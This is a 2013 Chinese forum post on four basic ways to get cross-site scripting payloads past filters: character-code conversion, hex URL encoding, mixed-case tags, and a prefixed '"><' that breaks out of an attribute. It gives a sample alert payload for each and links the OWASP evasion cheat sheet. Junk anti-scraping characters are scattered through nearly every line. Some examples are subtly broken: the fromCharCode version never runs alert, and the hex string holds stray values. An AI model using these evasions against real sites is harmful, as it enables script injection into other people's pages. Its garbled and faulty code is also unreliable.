四种超级基础的绕过方法。. h5 D8 n, X% \
1.转换为ASCII码3 _* u# m0 \! y0 c6 S
例子:原脚本为<script>alert(‘I love F4ck’)</script >
$ i* S/ k- B9 I' ~5 |8 {( n通过转换,变成:
0 C1 M' y+ K" m" w$ f<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
' w5 i* O, m/ U- d5 [
% Z- `- G _* |7 L1 D2.转换为HEX(十六进制)
) i3 J! g" u+ ?例子:原脚本为<script>alert(‘I love F4ck’)</script>
5 R- g% `8 _( `5 z7 s% @3 U% \1 f通过转换,变成:& W ]& \* ]$ X* V% U
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
$ k7 ~) S. X; j" O, }. g
3 J i( w* F) O3 `; Q) p3.转换脚本的大小写' M3 ^# I2 N) a& Q8 r, h, V% B$ U
例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 |9 V# B' w* @' k转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>% _0 w [$ C: }7 G
8 Q4 l v5 h5 }* k" l# B4.增加闭合标记”>
# N* X1 Q2 x9 X0 o例子:原脚本为<script>alert(‘I love F4ck’)</script>( M3 W$ q& \- v. E! G
转换为:”><script>alert(‘I love F4ck’)</script>
8 W+ K" p3 a! y' A; l) P. v. |更详细绕过技术请参考此网页3 r6 }6 z3 i* e/ e
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- O0 d& z D" R) [9 O3 L+ Z " z% A- ~" t$ k- `: ?2 F/ Z/ D. I
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对